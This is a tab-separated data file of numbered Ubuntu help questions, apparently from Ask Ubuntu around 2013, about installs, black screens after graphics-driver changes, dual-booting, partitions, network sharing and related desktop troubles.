372630	installing nero neuro-evolving robotic operatives	hi im new to ubuntu and would like to install nero . ( neuro-evolving robotic operatives ) . it is in a tar.gz file and has no readme.please help !
372632	ubuntu installation black screen	i tried to install kubuntu and ubuntu from a usb-stick . both times i used unetbootin to get the .iso on my stick . everytime i boot from it i see the following : try ubuntu without install install ubuntu check disc for defects no matter what i choose , i 'm getting a black screen after that and nothing is happening . what confuses me is that i was able to install kubuntu on a virtual machine on the same computer . my pc specs are : msi ge70 intelcore i5 nvidia geforce gt750m 8 gig ram 1 hdd with 2 partitions ( 1 600gb windows ; 2 90bg < - here i want to install kubuntu but i am not even getting to the installation . thanks
372634	upgrade nag - xubuntu 13.04 ( xfce ) continually asks about updating to 13.10	i 've just built a system with xubuntu 13.04 and it 's continually ( ~ every 15 minutes ) asking if i want to upgrade to 13.10 . i hit the `` do n't upgrade '' button and it 's back again in 15 minutes or so . same with the `` ask me later '' button . it 's asking this in a small box that ca n't be expanded and wo n't let me see the whole thing even with the sliders .
372637	unity gone , no desktop . struggle to get back	after update , unity is gone . only wallpaper en desktop icons is showing . i 've tried several suggestions , but i struggle to open terminal with the keys cntrl+alt+t . nothing happens . what else can i do to restore everything back ? i 'm running ubuntu 12.04 lts . i realise that this may look like a duplicate . but i do n't know what else to do .
372646	internet download manager	hi anyone please send link to download internet download manager on my ubuntu or else terminal commands . i am using only ubuntu and jolicloud os on my netbook .
372649	how can i make `adb shell` have the correct terminal size ?	so adb shell has an annoying bug where it does n't realize that your graphical terminal app is larger than 80x24 , so when you try to run any kind of full-screen console apps like vi or emacs ( or any ncurses app ) , it does not take up the full screen , only a small portion of it . is there a way to fix this easily ?
372653	how to set up fqdn with dynamic ip ?	can i setup my www.example.com address when i have a dynamic external ip adress ( no router ) and if so whats needed to make it work ? the server is already installed with ubuntu server 12.04.3 and lamp packages and works . i would like to use a domain name instead of the ip address since it changes .
372654	how do i submit a patch to a launchpad project ?	with a git/github background and knowing very little about bazaar vcs , i would like to occasionally report a bug to projects hosted on launchpad , and even send a patch . i 'd like to do it in a `` proper '' way so that it 's ready for merging or improvement while not getting in way . i ca n't seem to find a decent simple how-to suited for my needs . what i did so far : i have created a launchpad account , reported the bug , installed bazaar and setup ssh keys etc . now if it was github , i'd fork the repo , clone the forked repo , create a sanely named branch and do the work , commit + push , create a pull request using github wui . but it 's not github , and both launchpad and bazaar architectures seem quite different from their github/git counterparts . so could a kind soul save me from drowning in tons of documents and compile a straightforward step path , mainly the second part ? possibly including relevant cli commands when they are needed ? edit : it seems that i should clarify if i 'm asking specifically about ubuntu packages ( whatever it means ) or launchpad projects . i do n't really care much about distinction between ubuntu packages and non-ubuntu packages . any software could be in ubuntu today and out of it tomorrow , or vice-versa . the development is what matters much more than distribution . so i was assuming that not every single package distributed in ubuntu is hosted on launchpad , an `` official '' or `` default '' workflow for launchpad exists ( well if all devs can agree on using bazaar , why could n't most of them agree on a patching workflow ? ) , so i 'm asking about the launchpad way , not the ubuntu way . and i chose au because since the intersection is vast , i guess it 's pretty on topic here .
372671	attempt start postgres server fails and gives no response ?	when i do on my local machine . sudo service postgresql start i usually get the following or some error . * starting postgresql 9.1 database server [ ok ] but when i do it on my server i get no response , not even an error message . both my local machine and the server are ubuntu 12.04 lts and both have postgres installed through apt-get . the only difference between the two is that my local machine is 32-bit and the server is 64-bit , but that should not matter . i tried uninstalling and installing , but the same problem occurs . how to i start postgres ?
372672	what could cause a script to fail to find python when it has ` # ! /usr/bin/env python` in the first line ?	trying to get casperjs running on ubuntu 12.04 . after installing it when i run i get : 09:20 $ ll /usr/local/bin/casperjs lrwxrwxrwx 1 root root 26 nov 6 16:49 /usr/local/bin/casperjs - > /opt/casperjs/bin/casperjs 09:20 $ /usr/bin/env python -- version python 2.7.3 09:20 $ cat /opt/casperjs/bin/casperjs | head -4 # ! /usr/bin/env python import os import sys 09:20 $ casperjs : no such file or directory 09 : 22 $ python python 2.7.3 ( default , sep 26 2013 , 20:03:06 ) [ gcc 4.6.3 ] on linux2 so python is present and runnable , casperjs is pointing to the right place and it is a python script . but when i run it i get `` no such file '' . i can fix it by changing the first line of the casperjs python file from : # ! /usr/bin/env python to : # ! /usr/bin/python result : $ casperjs -- version 1.1.0-dev i managed to fix it , but i 'm wondering why it did n't work with # ! /usr/bin/env python , since that seems to be a normal interpreter line . do i have something configured wrong ? here are the steps to get casperjs : $ git clone git : //github.com/n1k0/casperjs.git $ cd casperjs $ ln -sf `pwd`/bin/casperjs /usr/local/bin/casperjs $ casperjs : no such file or directory
372675	ubuntu does n't boot after installing quadro drivers	so i installed a 2nd graphic card , installed the proprietary driver for it ( nvidia quadro ) , but now when i boot the computer , the purple screen loads for a while and then all i get it 's a black screen with a blinking cursor . i 've taken the 2nd card out but it does n't change anything . i am preparing a usb stick to boot from it and try to access my system : is there anything i can do to fix this ? it 's a ubuntu 13.10 64 bits
372685	unable to use hdmi on ubuntu 12.04	i 've been trying to get hdmi working on my dell inspiron n5110 to my samsung tv but my computer does n't seem to detect anything . i do not have a nvidia gpu and thus i 'm not sure if installing nvidia drivers would help . thanks
372686	after installing nvidia drivers , i boot into a black screen [ 13.10 ]	edit : trying solution after solution found on these forums with the bootloader has apparently corrupted the bootloader . i missed pressing shift twice in a row and on the third attempt , the bios does not recognize a bootloader anymore . so it looks like i 'm starting from scratch . i am new to ubuntu and i am using a 1440p & 1080p multi-monitor display setup . using the default drivers ( neuveau ? ) , i am unable to get my display working because when i change my 1080p screen to be in portrait mode instead of the default landscape mode , my 1440p monitor goes black ( it 's a crossover 27 '' ) . as a result , i assumed that the neuveau drivers wo n't cut it for my setup . so , i installed nvidia drivers for my gtx 680 using this guide : http : //www.howopensource.com/2012/10/install-nvidia-geforce-driver-in-ubuntu-12-10-12-04-using-ppa/ after installation and reboot , both of my monitors are now black . i can hear the ubuntu jingle at the log-in screen . pressing ctrl+alt+f1 results in a black screen with a flashing white underscore . using just one monitor procures the same results . i am at a loss of where to go next . thanks for your help . edit : i decided to try running the following command ( in recovery mode ) : sudo apt-get purge nvidia-current this did not resolve my issue . i still boot into a black screen . 2nd edit : things are getting stranger now . after attempting to uninstall the video drivers , i booted into recovery mode to try to update my system and reinstall them . after trying the networking option , ubuntu froze there . so i did cntrl+c and ubuntu booted . my primary monitor was still black , but my secondary somehow worked . after logging in , my driver now says gtx 680 . so , i rebooted , and now i 'm still back at the black screen on both monitors .
372687	ubuntu ati radeon hd 4500 s official drivers	i 've tried for over a year to get my ati card to work with ubuntu but have n't managed to get it to work . i think that i can install ubuntu hardy heron has the official drivers for my ati radeon mobility hd gpu , so i am thinking about downgraiding to that . do you think this is a good idea , and do you know if there is a list of officially supported drivers ?
372689	how to install & run activepython 2.7.x under wine ?	i have kubuntu 12.04 and i purchased crossover linux . i 'm using crossover version 12.5.1 ( latest version ) . i need to install activepython 2.7.x for windows ( x86 ) from http : //www.activestate.com/activepython/downloads i downloaded activepython-2.7.5.6-win32-x86.msi as this is the only version available that meets the requirements ( i.e. , 32 bit and 2.x python ) . i followed the usual method of installing software in wine where i picked the file above and chose my wine bottle and installed it . the dialog reported that the installation completed . however , i can not launch any of the python tools ( idle gui or interactive shell ) . i tried launching via the `` run command '' dialog with debug logging enabled . here is the output : $ cat pythonlaunch.log ** thu nov 7 16:06:14 2013 starting '/opt/cxoffice/bin/wineloader ' 'winewrapper.exe ' ' -- workdir ' '/home/myuser/.cxoffice/mybottle/dosdevices/c : /python27 ' ' -- start ' ' -- ' '/home/myuser/.cxoffice/mybottle/dosdevices/../drive_c/python27/python.exe' fixme : exec : shell_execute flags ignored : 0x00000100 no errors are reported anywhere afaik . anyone have any idea what is wrong ? ( fyi , i have to run python in wine . i ca n't use my linux python install for this requirement . and i 'm told it needs to be activestate python because the version from python.org is missing some needed libraries . i am able to launch python 2.6 from python.org , but that 's not the activestate version i am required to use . )
372694	only skype has no title bar in lubuntu	i am using lubuntu 13.10 . i am facing a problem with skype , it has no title bar , so i ca n't move it . here you can see the screen shot click for a full-resolution image .
372695	loud and annoying noise on login	i have a pc with kubuntu 13.10 64-bit on it . the problem is that whenever i log in ( automatic log in is enabled ) , there is a loud double-click noise that sounds from the speakers whether the volume is muted or not . i have two sound cards ; the motherboard audio , which is disabled in the bios , and the creative ! labs sound blaster x-fi sb0460 , which i have normal speakers plugged into . does anyone know how to fix this ? relative lspci lines : 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] beavercreek hdmi audio [ radeon hd 6500d and 6400g-6600g series ] 02:05.0 multimedia audio controller : creative labs sb x-fi using default phonon backend . ( i am not really sure what other information to provide , but will gladly edit in anything upon request . )
372697	pxe booting on old computer	so my computer is not working - the disk is totally cleared , i 've deleted grub and plop which i used to install new system , because cd-rom is broken and bios is old ( whole computer is old , it 's sony vaio pcg-gr250 ) so it wo n't allow me to do it via usb and i got no floppy drive : ) the only way is to pxe boot plop and install linux from usb after plop has been opened . ( i 'm not a specialist but that 's how i see it ) i 'm using mac os x 10.9 and i followed number of tutorials how to set up tftp and dhcp server and i got plop here , but when i boot up with pxe it says that it found dhcp but tftp timed out . any help or alternative way of rescuing old laptop ? thanks in advance !
372699	ubuntu dual boot win 8	i have tried everything suggest . i have disabled everything that has needed to been disabled , secure boot , fast boot , legacy mode enabled , set my priorities . yet win 8 still boots over ubuntu.. help . i have tried almost everything . i used the usb installer ubuntu website suggested . : /
372700	spurious resets on ubuntu	i have a pc running ubuntu 13.04 64bit , and i do weekly updates , so everything should be up-to-date . everything is running fine , but sometimes , once-twice a week a complete reset happens . i think it must be software or hardware ( perhaps videocard ) related , but i ca n't figure out what could be wrong . can anybody suggest some ways , log files , where i could continue to search ? by looking just at dmesg/dmesg.0 and xorg.0.log i got nowhere . i cant find even a user application segfault . any help is really appreciated .
372701	cant make a usb booteable ubuntu 13.10	hey that my second question.. sorry for my english ! i tried to make a usb booteable with ubuntu 13.10 . thats the problem everytime that i tried to boot it came an error ... syslinux no default or ui configuration directive found . before post an answer i already tried renamed isolinux etc ( folder and cfg n bin ) with syslinux and tried too using yumi , universal boot and live linux ... thanks for ur help !
372703	how to install boost 1.53 or 1.54 from terminal ?	i 'd like to install boost 1.53 or 1.54 from terminal in ubuntu 12.04 . how do i do this ? i used the libboost command and it gave me 1.48 , whereas i need a more recent version . thanks in advance
372704	clicking pidgin message in ubuntu 13.10 indicator menu does n't focus on message	when i get a message on pidgin , if i click the notification in the indicator panel , it does n't bring the message into focus . it highlights that the message has been opened in the unity dock , but i have to click the dock icon or alt-tab to the window to read the message . does anyone know a fix so i can view the messages from the indicator notification ? ( note : this actually works in 12.04 , so i 'm assuming it 's a bug in the later version ) . any help greatly appreciated : )
372705	netgear n300 wna3100 install ubuntu 13.04	i 've never used ubuntu before so i am completely lost with what to do . i bought a netgear n300 ( wna3100 ) wireless adapter card a few months ago after my old card stopped working . i decided to dualboot my computer a few weeks ago and i 've come across a few issues , this being the most important . it works perfectly fine on my windows 7 install , but not on ubuntu . i 'm using 13.04 .
372710	are there alternative payment methods for donations ?	paypal wo n't accept the card i have , and i wanted to say `` thank you '' for all the work on ubuntu with , well , some cash . how else can i pay ?
372712	inspect-element by default on browser	i have this web page that each time i go to , i modify something in the source code with the 'inspect element ' ( on chrome and chromium browser ) or 'firebug ' ( on firefox ) ! can i make the browser making this action automatically ( by default )
372717	gotowebinar for ubuntu	can the gotowebinar application work on ubuntu 's operation system ? i am seeing that it is not applicable on this , is there a way around the problem ?
372718	ubuntu wireless 404s often	i am new to ubuntu and have just installed 13.10 . i have an alienware m14x r2 and , at random intervals , webpages will simply fail to load . i never lose the wireless connection , though , according to ubuntu . i am also running windows on a separate hard drive and when i use windows , this does not happen . i believe this is ubuntu acting up as this happens on two separate wireless networks i use daily . ( when i used a wired connection , this does not happen either ) under additional drivers , nothing is listed . additionally , the solutions i have read , which suggest to change the dns resolver in /etc/resolv.conf is outdated as other users have said this solution no longer works because the functionality of resolve.conf has changed . thank you for your help . here is my wireless card information : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 650m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gk107 hdmi audio controller ( rev a1 ) 07:00.0 ethernet controller : qualcomm atheros ar8151 v2.0 gigabit ethernet ( rev c0 ) 08:00.0 network controller : qualcomm atheros ar9462 wireless network adapter ( rev 01 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 09:00.1 sd host controller : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 )
372723	unable to use network sharing	i acquired a new pc to mess around with ( a dell optiplex 760 ) and after installing synergy because i only have one mouse ( synergy is used to share a keyboard , mouse and clipboard over multiple computers ) i tried to set a few maps as shared so i can use it 's hard drive as a data storage . it asked to install samba which is understandable so i allowed it to install samba . it failed to install but it asked me to restart anyway so i did . after the restart i could n't connect with the pc . i removed samba and re-installed it ( it failed again ) . however my dell can now connect with the shared files of my laptop ( after giving my password for these files ) but my laptop can not connect with the shared files of my dell . it does prompt me for a password though but i do not have any samba users setup since i ca n't start samba ( it is n't even listed in the dash but it must have changed something since i can now access files on remote pc 's ) . i disabled ufw on both computers so the install is a vanilla 13.10 besides for synergy and my laptop can access remote files on other computers and can be accessed by other computers . anyone any idea how to fix this ?
372725	what are socket files ?	recently , i started using tmux ; i 'm trying to use the pair programming feature in that software . during the process a socket file was created . my question is : what are socket files , how am i to open them on ubuntu and how are they used ?
372727	ca n't upgrade due to not enough space in /boot	/boot $ ls abi-3.8.0-19-generic initrd.img-3.8.0-29-generic abi-3.8.0-25-generic lost+found abi-3.8.0-26-generic memtest86+.bin abi-3.8.0-27-generic memtest86+_multiboot.bin abi-3.8.0-29-generic system.map-3.8.0-19-generic abi-3.8.0-30-generic system.map-3.8.0-25-generic abi-3.8.0-31-generic system.map-3.8.0-26-generic config-3.8.0-19-generic system.map-3.8.0-27-generic config-3.8.0-25-generic system.map-3.8.0-29-generic config-3.8.0-26-generic system.map-3.8.0-30-generic config-3.8.0-27-generic system.map-3.8.0-31-generic config-3.8.0-29-generic vmlinuz-3.8.0-19-generic config-3.8.0-30-generic vmlinuz-3.8.0-25-generic config-3.8.0-31-generic vmlinuz-3.8.0-26-generic grub vmlinuz-3.8.0-27-generic initrd.img-3.8.0-19-generic vmlinuz-3.8.0-29-generic initrd.img-3.8.0-25-generic vmlinuz-3.8.0-30-generic initrd.img-3.8.0-26-generic vmlinuz-3.8.0-31-generic initrd.img-3.8.0-27-generic
372729	configure ubuntu 13.10 to rotate display globally ?	how can you configure ubuntu 13.10 to rotate the display globally ( for ldm and all users ) ? i have an intel graphics chipset with an x64 processor . lspci shows the following for my graphics chiset , and i do not have any propietary drivers installed : 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) i am using the xorg configuration file below , which worked perfectly in ubuntu 13.04 , where ldm and each user session was rotated 90 degrees . however , this same configuration file no longer works in ubuntu 13.10 . per other posts , i 've tried placing this file in /etc/x11 , i tried placing this file in /usr/share/x11/ , and i also tried moving it to /usr/share/x11/xorg.conf.d/ where i renamed it to 10-xorg.conf . ( i did ensure that permissions were -rw-r -- r -- ) . section `` monitor '' identifier `` samsung syncmaster 171n '' modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync option `` rotate '' `` left '' # option `` preferredmode '' `` 1280x1024_60.00 '' # horizsync 30.0 - 81.0 # khz # vertrefresh 60.0 - 60.0 # hz endsection section `` device '' identifier `` intel '' driver `` intel '' option `` accelmethod '' `` sna '' endsection section `` screen '' identifier `` default screen '' monitor `` samsung syncmaster 171n '' device `` intel '' defaultdepth 24 subsection `` display '' modes `` 1280x1024_60.00 '' endsubsection endsection section `` serverlayout '' identifier `` default layout '' screen `` default screen '' endsection
372730	how do i boot linux from a efi partition on a usb drive	i managed to create a usb drive image for booting with efi using mac-linux-usb-loader ( issue ) . the directory structure is as shown here . f : \ > tree /f folder path listing for volume new volume volume serial number is 9478-c771 f : . └───efi └───boot bootx64.efi boot.iso boot.iso is ~689mb and bootx64.efi is ~600kb . while attempting to boot , i end up in the grub shell . i video recorded my screen and have some screen shots here . how do i proceed booting ? i care more to install linux on my mac mini ( late 2012 ) than to fix this issue . i will be happy to boor boot manually and start the installer . i am installing ubuntu-13.10-server-amd64+mac.iso
372731	no files will open using apturl or any other application ?	i am trying to install wine so i can eventually put windows 8 back on my other ssd , but , when i attempt to click the install link for wine 1.4 it wo n't run it with any application , and i noticed it needs to use apturl or something similar . any help greatly appreciated .
372732	screen brightness emachines e725 not working	i am a newbie please be gentle with me . emachines e725 running ubuntu 13.10 32 bit . i can access the screen brightness control through the system settings or by using fn keys . the little adjustment window pops up and indicates that the brightness is changing but the brightness always stays at 100 % . my eyes are burning out . even a partial fix eg setting it to minimum permanently would be preferable to the current situation . thanks in advance .
372734	ubuntu - error- load the kernel	hey i have a loaded ubuntu 12.04.2 64 bit live cd version for my windows 8 . i go to try it without installing ( load from cd ) , and it says : error : no files found error : need to load a kernel what am i missing , i do n't want to install it until i can preview it , is there any way around this ? i turned off uefi
372736	anything mouse like is n't seen by ubuntu 13.10	i have a upgraded 13.10 from 13.04 and today this issue of anything that is mouse-like is not seen by ubuntu . the only input device that works is my wacom tablet and it 's pen . i already checked for updates and have the latest updates for the ubuntu system . here is the lsusb output : bus 002 device 002 : id 04f2 : b209 chicony electronics co. , ltd bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 002 : id 056a:00b8 wacom co. , ltd intuos4 4x6 bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub this is issue a bug or how to fix it ? i ca n't even use the live usb of ubuntu 13.10 to fix the issue . edit 1 : seems that ubuntu is n't seeing the clicks done by a mouse if it 's the wacom tablet . edit 2 : i think it 's a bug but i need help to report it . edit 3 : based on this question , mouse problem on ubuntu 13.10 , it maybe be a bug . i think it 's been confirmed by someone else . see edit 2 , please . edit 4 : my trackpad is also broken on ubuntu 13.04 and ubuntu 13.10 , but i know that is another conformed bug .
372740	install c/c++ compiler just like turbo c or dev c++	hye . i used to do programming in windows but now i am switched to linux . i tried to get the ide of c/c++ from ubuntu software center but it is also not providing me any ide for c/c++ . i want to install c/c++ ide just like turbo c or dev c++ in ubuntu ...
372743	bootable usb image	i have read and tried a number of the scenarios in the clonezilla live docs and i have n't as yet been successful in creating what i hope i can . i have also searched the forum here ( via key words etc ) for possibly similar scenarios and again , have not been successful . i built an ubuntu installation with one java based app and truecrypt on the hd of my laptop . using gparted , i shrank the partitions for ubuntu and truecrypt to 8gb and 4gb respectively . i have a non-u3 16gb usb drive that i would like to transfer the two partitions onto in such a way that i can boot directly off the usb drive . ideally , i would n't have to re-create the truecrpt partition but if i did , that would n't be a show stopper . i used clonezilla to create an image of the two partitions and save it to a third partition ( sda4 ) . can someone please point me in the right direction to instructions that will allow me to create a bootable usb version of the two partitions on the hd ? i 've tried part image to part image disk to disk ( usb too small ) basic mode advanced mode help , please ? if clonezilla is not the right tool , please let me know what is . any and all assistance would be appreciated . thank you .
372744	< super > key is not invoking dash for me , only launcher	i tried setting super '' key to show dash , launcher , help overlay '' to super , and it is already super , but it 's not solving the issue . key tapped and launcher is there , dash not showing . i have to click on it with my mouse .
372745	installing a .deb package to /usr/local directory using dpkg ( 1 ) ?	i want to install a binary .deb package under the `` /usr/local '' directory rather than the default `` /usr '' directory but i ca n't because the database `` /usr/local/var/lib/dpkg '' does n't exist : $ sudo dpkg -- install -- instdir=/usr/local /vagrant/*.deb selecting previously unselected package udunits . ( reading database ... 30137 files and directories currently installed . ) unpacking udunits ( from ... /udunits-2.1.26-linux.deb ) ... setting up udunits ( 2.1.26 ) ... processing triggers for install-info ... dpkg ( subprocess ) : admindir must be inside instdir for dpkg to work properly dpkg : error processing install-info ( -- install ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : install-info $ sudo mkdir -p /usr/local/var/lib/dpkg $ sudo dpkg -- install -- root=/usr/local /vagrant/*.debdpkg : error : failed to open package info file `/usr/local/var/lib/dpkg/status ' for reading : no such file or directory how can i change the installation-directory from `` /usr '' to `` /usr/local '' ?
372746	abnormal boot screen 13.10 fresh install , possible broadcom error ?	when i boot , after the bios i get a blank purple screen instead of the usual : ubuntu ... ... and then a quick black screen that says : [ 11.398391 ] support for cores revisions 0x17 and 0x18 disabled by module param allhwsupport=0 . try b43.allhwsupport=1 and then it boots up fine , no problems , sometimes there 're error report notifications . i have a dell inspiron n5010 laptop , and i heard from someone this error may have to with my broadcom wireless ? i used to dual boot windows , then i dban 'd the disk and fresh installed 13.10 anyone have any ideas ? thanks
372749	requires installation of untrusted packages ? ? and cant update apt-get	when i try to install any app from ubuntu software center i get this : i had read somewhere that i need to enter apt-get update , but this is the result : root @ alexander-pc : ~ # apt-get update e : gpg error : dl.google.com stable inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) any ideas ?
372754	which ubuntu for win 8 ?	i really want ubuntu 12.04 for the lts but am i able to dual boot it on windows 8 ? i have already tried 12.04 and a few others .
372755	bash history not containing all history and blank after reboot , how to resolve ?	i 've recently upgraded from 13.04 to 13.10 and realized my terminal bash history is not surviving reboots . cat ~/.bash_history gave me a permissions denied error . i , possibly unnecessarily or wrongly , issued a chmod 777 ~/.bash_history to see if that would help ... and although i could then cat and read some contents it contained not much of anything as far as history . i also tried sudo rm ~/.bash_history after reading bash history not being preserved strangely , after doing that , i typed a few test commands , ls , ls -lah ... and upon pressing the up arrow to go back through history it contained those two commands as well as the odd history from some far off time in the past but very few results and not the hundreds of commands i typed earlier in the day . is there a new place bash history is stored ? how can removing ~/.bash_history not get rid of the commands that are somehow lingering ? i am not certain , but i believe my root bash history is acting normal . my user bash history is what 's causing me trouble . any help and guidance in tracking down and solving this problem is appreciated .
372757	etc/config/wireless missing in my ubuntu 13.10 which i need to configure batman or olsr	i was trying to implement batman or olsr routing protocol but most of the documents say to configure etc/config/wireless file or other files which is not there in mine . is it because i have the latest version ? is this file located in any other folder in 13.10 ? or is there another way to configure batman or olsr on 13.10 ? please help with any documentation if available .
372758	ubuntu boots in cli after kde uninstall	i installed kde to see if it 's better than unity . i did n't like it , so i uninstalled it , but now , when i boot in ubuntu , it just goes to command line , asking for a user and password . how can i get it to the `` default '' state that used the unity gui ?
372759	ringtones in ubuntu touch	i have a nexus 4 which is currently running the most up to date ubuntu touch build . as much as i enjoy the default ringtones and notification sounds included with the os , i was wondering where the directory which holds said sounds is and how to access it on my pc . i figure if the notification sounds are in .ogg format i should be able to add android notification sounds and ringtones . any ideas ?
372761	parallel access to ntfs system from windows and ubuntu	i have the windows 8.1 as a host system and i 'm using the vmware with ubuntu 12.04 for work . the virtual machine 's disk is a physical partition on my ssd disk . i wonder if is possible to have other , ntfs or fat32 partitions which i would access ( share ) in parallel from host and virtual machine ? the question is if it will have a conflicts with files opened at the same time from both systems , or any other type of problems ?
372762	how to install a .jar file	i would like to know how to install java and minecraft ( download linux version here )
372763	windows wo n't boot after unsuccessful ubuntu install	windows 7 hp laptop 3 gig ram 2.1 or 2.6ghz not sure about the rest well , i tried to install ubuntu and be able to dual boot alongside windows . simple procedure and i followed it to the t. needless to say , it wont recognize my default hard drive or any of the partitions . booting via my flash drive will let me use the ubuntu os , will enable access to my file system , and will let me back up the files . done . so now i need to reinstall windows but any option i use to try to reinstall the factory image will not yeild a partion to choose . if i cant choose a partition to restore , how can i restore windows ? because if i have access to my files then nothing should be wrong with windows , but it still wont boot . i have the flash drive set to priority on the boot order right now but i have tried every option . i 've tried with the windows cd and no partitions are availabe . yet booting in ubuntu i can see all the partitions like nothing is wrone . anyone have an idea of what i did and how i can recover so i dont need to reinstall ? to add insult to injury , i unsuccessfully installed ubuntu . it would not install to the partition i made prior to my attempt . my problem is i know how to do all the steps i have done today and nothing is making sense . upvote for every answer ! i need help ! lol thanks in advance , guys .
372767	ubuntu 12.04 resolution stuck on 640x480	i am new to ubuntu and i was trying to get my hdmi enabled tv to work with my ubuntu 12.04 computer and i installed a nvidia driver using the `` additional drivers '' program . after that did n't work , i started playing around with the dual booted windows 7 on my computer . now , i 've never used that windows since i installed it so i was stripped down to bare minimum so i tried to adjust the resolution ( as it was on lowest resolution ) and tried to connect the hdmi , which did n't work . after that i came back to my ubuntu installation only to find out that it is now stuck on 640x480 resolution . i tried to remove the driver that i installed again using the `` additional drivers '' program but that did n't help at all . the error that showed up was - could not apply the stored configuration for monitors none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) any help would be appreciated as this is very annoying . thanks
372768	openssh users and sftp	i added users to my server , but when i try to login , it prompts me for a password , which i never put in . do any of you know what the default password is ? also , i would like to setup sftp , so can anyone help me with that ?
372773	partition table problems . primary within extended ?	i am a new beee , and probably out of my depths . i dual booted ubuntu 12.04 on a machine already running windows . i eventually dumped windows , and used gparted running off of the ubuntu desktop livecd to expand my limited hard drive space . in the process i believe i may have messed up my partition table . i believe i have my primary partition running within an extended partition , which may be a problem ? exterior hard drives , which before i repartitioned would mount as read-only , now wo n't mount . when entering sudo fdisk -l i get this : disk /dev/sda : 40.0 gb , 40000000000 bytes 255 heads , 63 sectors/track , 4863 cylinders , total 78125000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9dc96e9e device boot start end blocks id system /dev/sda2 2048 78123007 39060480 5 extended /dev/sda5 4096 77080575 38538240 83 linux /dev/sda6 77082624 78123007 520192 82 linux swap / solaris update : more info . so , i am basically trying to figure out why my external drives wo n't mount anymore . and i suspected that had to do with the repartitioning i did , and a messed up partition table , but perhaps i 'm wrong . i was asked in the comments for dmesg | tail before and after adding a device : before : [ 332402.816025 ] parport0 : fifo is stuck [ 332402.864049 ] parport0 : busy timeout ( 1 ) in compat_write_block_pio [ 332412.864070 ] fifo write timed out [ 332482.900041 ] parport0 : fifo is stuck [ 332482.948067 ] parport0 : busy timeout ( 1 ) in compat_write_block_pio [ 332492.948038 ] fifo write timed out [ 332513.693367 ] usb 1-3 : usb disconnect , device number 7 [ 332562.972045 ] parport0 : fifo is stuck [ 332563.020056 ] parport0 : busy timeout ( 1 ) in compat_write_block_pio [ 332573.020100 ] fifo write timed out after adding a western digital hfs plus external hard drive : [ 332800.962790 ] sd 8:0:0:0 : [ sdb ] no caching mode page present [ 332800.962800 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 332800.973591 ] sdb : [ mac ] sdb1 sdb2 sdb3 sdb4 [ 332800.977422 ] sd 8:0:0:0 : [ sdb ] no caching mode page present [ 332800.977432 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 332800.977439 ] sd 8:0:0:0 : [ sdb ] attached scsi disk [ 332803.208062 ] parport0 : fifo is stuck [ 332803.256075 ] parport0 : busy timeout ( 1 ) in compat_write_block_pio [ 332808.128065 ] usb 1-3 : reset high-speed usb device number 8 using ehci_hcd [ 332813.256036 ] fifo write timed out also , when i pull up my partition table with my wd external drive attached , underneath the partition table i get this : disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table the other external drive i am trying to connect is a glyph gt050q hfsplus which yields similar output . any help is great appreciated ! thanks , todd
372774	what application to select to open and download programs on ubuntu ?	i have tried downloading both wine and vlc player , but it asks me to select an application to run the program installation . not sure what to pick ... should n't there be an application to automatically download something ? ps i 'm a noob at this
